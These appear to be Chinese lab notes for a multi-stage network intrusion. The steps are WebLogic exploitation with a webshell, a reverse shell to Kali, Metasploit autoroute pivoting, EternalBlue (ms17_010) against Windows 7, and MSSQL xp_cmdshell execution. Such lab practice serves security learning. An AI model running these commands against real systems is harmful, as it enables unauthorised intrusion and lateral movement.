weblogic有cve漏洞,已经用冰蝎连接上了,
shell反弹到kali
kali按上面输入
成功连接
设置第一重代理
进入shell查看ip
将10.10.20.0/24端放在路由上
输入exit从shell退出
然后输入run autoroute -s 10.10.20.0/24
查看run autoroute -p
将这个挂起
现在可以打win7了,用永恒之蓝
search ms17_010
use 0
show options
set payload windows/x64/meterpreter/bind_tcp
set rhosts IP
run (可能会失败多试两次)
进入shell查看ip
退出shell
设置二重代理
挂起
验证是否成功搭上
因为server有mssql漏洞使用这个模块攻击
search auxiliary/admin/mssql/mssql_sql
use 0
试试别的
set SqL EXEC xp_cmdshell 'dir';
